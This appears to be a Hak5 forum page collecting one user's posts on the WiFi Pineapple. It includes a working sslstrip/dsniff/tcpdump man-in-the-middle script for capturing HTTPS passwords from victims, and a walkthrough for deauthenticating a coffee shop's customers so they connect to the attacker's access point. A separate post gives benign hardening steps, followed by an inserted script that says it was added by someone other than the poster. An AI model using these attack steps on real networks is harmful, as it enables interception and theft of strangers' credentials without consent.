itsm0ld
Active Members
Posts: 163
Days Won: 4

Everything posted by itsm0ld

  1. It would have to be a separate wireless card from the one providing internet to the pineapple, or anything really, since it needs to be in monitor mode. I would recommend one of the Alfa USB wifi adapters the Hak Shop sells; I have several with me all the time. Or, if you have an Android phone, I use a simple app called WiFi Analyzer, I think. It doesn't do much, but it does give me the BSSIDs of nearby APs, and it also looks less suspicious.
  2. I believe the issue with running airmon on the pineapple is that the wireless card can't be in monitor mode and have Karma enabled at the same time... I believe Karma needs to be in master mode.
  3. Confirmed working on 1.0.2. Anyone else get this working, or did I just ramble on?
  4. Make sure you copy and paste that text into a file called p3.sh, or whatever, just with a .sh extension; then to run it simply type ./p3.sh from a terminal window.
  5. Ok, here is my basic script. It gives me a live view of SSL strip activity and does a full packet capture to use later with NetworkMiner, Wireshark etc etc:

     #!/bin/bash
     #
     # Pineapple script by m0ld 2011 v3
     #

     # IPtables setup: turn on forwarding, NAT outbound traffic through eth1
     # and redirect port 80 from the pineapple side into sslstrip on port 10000
     echo "[+] Setting IPtables"
     echo "1" > /proc/sys/net/ipv4/ip_forward
     iptables -t nat -A POSTROUTING -o eth1 -j MASQUERADE
     iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
     sleep 2
     cd /root/captures/
     touch sslstrip.log

     # Dsniff in its own xterm; PID saved so it can be killed at cleanup
     echo "[+] Starting Dsniff"
     echo
     xterm -geometry 25x15+1+625 -T Dsniff -e dsniff -i eth0 -w /root/captures/dsniff.log &
     dsniffid=$!
     sleep 1

     # Tcpdump: full packet capture to /root/captures/tcpdump.pcap
     echo "[+] Starting TCPdump"
     echo
     xterm -geometry 30x15+1+100 -T Tcpdump -e tcpdump -ni eth0 -w /root/captures/tcpdump.pcap &
     tcpdumpid=$!
     sleep 1

     # Sslstrip, plus a second xterm tailing its log for the live view
     echo "[+] Starting sslstrip..."
     echo
     xterm -geometry 75x15+1+200 -T sslstrip -e sslstrip -f -p -k 10000 &
     sslstripid=$!
     echo
     xterm -geometry 75x15+1+600 -T SSLStrip-Log -e tail -f sslstrip.log &
     sslstriplogid=$!
     sleep 2
     clear
     echo
     echo "[+] IMPORTANT..."
     echo "After you have finished please clean up properly by hitting Y"
     echo "if Pineapple is not closed properly ERRORS WILL OCCUR "
     read WISH

     # Clean up: kill the four xterms, then undo forwarding and all iptables rules
     if [ "$WISH" = "y" ] || [ "$WISH" = "Y" ] ; then
       echo
       echo "[+] Cleaning up"
       kill ${sslstripid}
       kill ${sslstriplogid}
       kill ${dsniffid}
       kill ${tcpdumpid}
       sleep 1
       rm dsniff.services
       echo "[+] Cleaning up iptables..."
       echo "0" > /proc/sys/net/ipv4/ip_forward
       iptables --flush
       iptables --table nat --flush
       iptables --delete-chain
       iptables --table nat --delete-chain
       exit
     fi
     exit

     This script assumes the interface providing the internet connection is eth1 and that the interface connected via cable to the pineapple is eth0. Also, you will want to create a folder /root/captures; it saves the SSL strip log and the tcpdump files in this folder for later review. If that's not the case for you, simply replace the eth1 and eth0 with whatever they are in your case.

     As a note, this script opens several terminal windows so you can see the sslstrip log in real time; it also saves a full packet capture via tcpdump for mining later. Lastly, you will notice that it keeps the original terminal window open and tells you you need to clean up. When you are done running the script simply hit the Y key and the script will clean up and close all the terminal windows. It does NOT delete the SSL strip logs or tcpdump files stored in /root/captures; however, if you don't move the files or rename them before you run the script again it will overwrite them. Test it out and let me know what you think.
  6. SSL strip will run against ALL clients, since you will be running it on the laptop against the Ethernet interface connected to your pineapple. And like we said, no arpspoof required =)
  7. Yes, "Are you indicating that the MAC that's showing associated with "Schnieder" is actually a MAC of a client connected to "Schnieder", and not of the "Schnieder" AP itself?" is correct. Using your log as an example, it's saying: client MAC 00:16:a4:fe:08:ab connected to your pineapple responding to the AP name of Schnieder.
  8. If you're using BT5, iptables should clear after a reboot. Also, since you are MITM there is no need to use arpspoof, since you actually are the gateway ;) I think arpspoof may be what's borking your tests. EDIT: This is the cleanup part of my script for iptables:

     iptables --flush
     iptables --table nat --flush
     iptables --delete-chain
     iptables --table nat --delete-chain
  9. From my experience, once Karma has been enabled and then disabled the regular wireless interface does not come back up until the device is rebooted. This happens on both of the new MK3's (AP51's) I own.
  10. I think you are using the tool wrong. Since the client already connected to you, why would you deauth it? You already have the victim. Basically you need the BSSID of the AP you want to attack, not a client... does that make sense? Let's pretend we are trying to get clients from a local coffee shop:

      Coffee shop AP SSID: java
      Coffee shop AP BSSID: 01:02:a4:2g:21:a3
      One coffee shop customer is on the wireless, MAC is: aa:bb:cc:dd:ee:ff

      Now you have your Pineapple set up next door and Karma is up and running... but you want the coffee shop customer, so let's deauth them! In this case you would enter the coffee shop's AP BSSID (01:02:a4:2g:21:a3) into the MK3 interface and hit deauth. This will cause the customer to be disconnected from the actual AP and hopefully connect to your pineapple. Basically I see two issues with what you're doing:

      1) You're trying to deauth a client that is already associated to you, so no need.
      2) You will need to get the BSSID of the actual AP with another tool like airmon-ng on your laptop. You will never be able to get the actual BSSID from the association log, because it is showing you what the CLIENT's MAC is and what AP it thinks it's connecting to... not what the AP's BSSID is.

      Does that make sense?
  11. I replied to another of your posts, but unless you are doing a phishing attack you will want SSL strip to get HTTPS passwords. Remember the traffic is encrypted between the victim's browser and the website, so even being MITM you need a tool like SSL strip.
  12. Have you looked at the wp3 script? It will take you through all the steps needed to get internet sharing and routing set up in BackTrack. From that point SSL strip is set up just like has been described many times, and since it will be running on your laptop you won't have the space limitations of the pineapple. If you're interested I can post up the script I use with my pineapples; it's a little more work to get working but it has tcpdump to log all packets for offline mining, SSL strip, and also takes care of the IP forwarding and internet sharing in BT5 R1.
  13. I actually thought I had a problem with the association log when I first got the MK3 using Firefox. I found that if I use Chrome I don't have any problems in the interface; however, I still can't see some of the fields when I use Firefox. Not sure why, but I would try switching browsers first; it's not hard and easy to check.
  14. Let me clarify. It's actually to a floating charger, not just an outlet plug lol
  15. I have never used a crossover cable, but my laptop NIC may be auto-crossing... it won't hurt anything, it may just not work.
  16. I actually wired the plug that came with the external HDD directly to the battery; the switch simply removed both the positive and negative wires to the Fon, just to make sure it doesn't get too much voltage from the charger. The charger I picked up from the local electronics store, and I just cut the end off the HDD power cable and attached it to the charger.
  17. It's a pack that I made up using five 1.2V rechargeable AA-sized cells... don't remember what the brand was, but I got them from the local Batteries Plus. I just wired them together in series to get 6 volts, then just shrink-tubed the whole thing. It is rechargeable; however, if I was going to do it again I would use Li-ion rather than NiMH just so it will hold its charge longer when not in use. (I leave this in the work car and dig it out when I want to play with it.) I typically get 3-4 hours of use out of this configuration with Karma on and the Ethernet port connected. Since this post I have actually added a switch that can be activated from the outside with a bent paperclip to turn it on or off, and in the off position I can plug it in and it will charge the battery, saving me from having to open and close the case every time.
  18. I don't remember the exact location, but you can find it by issuing the command: find / -name ngrep.sh
  19. If you don't need to flash the firmware, here is my How-To: http://forums.hak5.org/index.php?showtopic=24397
  20. This is another improvement I wanted to make after I got my MK3 when testing: securing the /pineapple web interface with a password. So here is how to do it!

      SSH to your MK3 (default IP is 172.16.42.1). Let's create the first file:

          touch /etc/httpd.conf

      Now let's add the /pineapple prefix to secure using nano:

          nano /etc/httpd.conf

      (file should be empty) Add the following:

          /pineapple:admin:$p$root

      This defines the page to secure, in this case /pineapple, then the username, in this case admin, then it looks to the root user's password (whatever you set; default is pineapplesareyummy). Close and save the changes.

      Now we need to edit /etc/config/uhttpd to use the httpd.conf:

          nano /etc/config/uhttpd

      Scroll down to the section called:

          # Configuration file in busybox httpd format

      and un-comment the following line to look like:

          option config /etc/httpd.conf

      Close and save changes. Lastly we need to restart uhttpd to make the changes active:

          /etc/init.d/uhttpd stop
          /etc/init.d/uhttpd start

      Now if you browse to http://172.16.42.1/pineapple it will prompt you for a username and password. Hope this helps!
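      The steps in the post above as one script, added here as an example; it is not itsm0ld's code nor anything shipped with the MK3 or OpenWrt. It writes the same /pineapple:admin:$p$root line, un-comments the same "option config" line in the uhttpd UCI file, and then reports which httpd.conf uhttpd will actually load, which is the check worth doing since an admin interface that any associated client can reach (as noted further down this page) should never be left open. The file paths are parameters (assumed, so you can run it against copies of the two files first); on the device you would pass /etc/httpd.conf and /etc/config/uhttpd and run it as root. The sample uhttpd file used for checking is constructed.

```shell
#!/bin/sh
# Added example, not itsm0ld's or Hak5's code: applies the /pineapple password
# protection from the post above. File paths are parameters (an assumption of
# this example) so the edits can be tried on copies before touching a live MK3,
# where the real paths are /etc/httpd.conf and /etc/config/uhttpd.
set -eu

# write_httpd_conf CONF PREFIX USER
# Writes one busybox-httpd style auth line "PREFIX:USER:$p$root"; uhttpd then
# requires USER to log in with the root system password for PREFIX.
write_httpd_conf() {
    conf="$1"; prefix="$2"; user="$3"
    case "$prefix" in
        /*) ;;
        *) echo "prefix must start with a slash: $prefix" >&2; return 1 ;;
    esac
    case "$user" in
        ''|*:*) echo "user must be non-empty and contain no colon" >&2; return 1 ;;
    esac
    # umask 077 so the auth file is never world-readable, not even briefly
    (umask 077; printf '%s:%s:$p$root\n' "$prefix" "$user" > "$conf")
}

# enable_uhttpd_config UHTTPD_CFG CONF
# Un-comments the "option config" line in the uhttpd UCI file, or appends one
# if the file has none at all. Running it twice changes nothing the second time.
enable_uhttpd_config() {
    cfg="$1"; conf="$2"
    if grep -Eq '^[[:space:]]*#[[:space:]]*option[[:space:]]+config' "$cfg"; then
        sed -i "s|^[[:space:]]*#[[:space:]]*option[[:space:]][[:space:]]*config.*|    option config $conf|" "$cfg"
    elif ! grep -Eq '^[[:space:]]*option[[:space:]]+config' "$cfg"; then
        printf '    option config %s\n' "$conf" >> "$cfg"
    fi
}

# active_config_path UHTTPD_CFG
# Prints the httpd.conf path uhttpd will load, or nothing if the option is
# still commented out. This is the check to run after editing.
active_config_path() {
    sed -n 's/^[[:space:]]*option[[:space:]][[:space:]]*config[[:space:]][[:space:]]*//p' "$1" \
        | tr -d "'\"" | head -n 1
}

# On the device (as root): sh secure_pineapple.sh /etc/httpd.conf /etc/config/uhttpd
if [ "$#" -eq 2 ]; then
    write_httpd_conf "$1" /pineapple admin
    enable_uhttpd_config "$2" "$1"
    echo "uhttpd will load: $(active_config_path "$2")"
    /etc/init.d/uhttpd stop
    /etc/init.d/uhttpd start
fi
```

      The $p$root reference means the web login shares the root password, so changing the root password from the default is what actually makes this protection worth anything; the script only wires the two files together as the post describes.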
  21. I have been tasked to implement a helpdesk system. I have looked at Zendesk and Kayako... looking for suggestions on what you guys are using.
  22. I don't have an immediate use for this, but I can see the usefulness of it, so if you don't mind keeping this post alive, I for one am interested in following it.
  23. Yes, using the web interface you can change the default SSID.
  24. You can in fact connect to the pineapple interface from any victim.
  25. If you do get a little button set up I would be interested in it also =)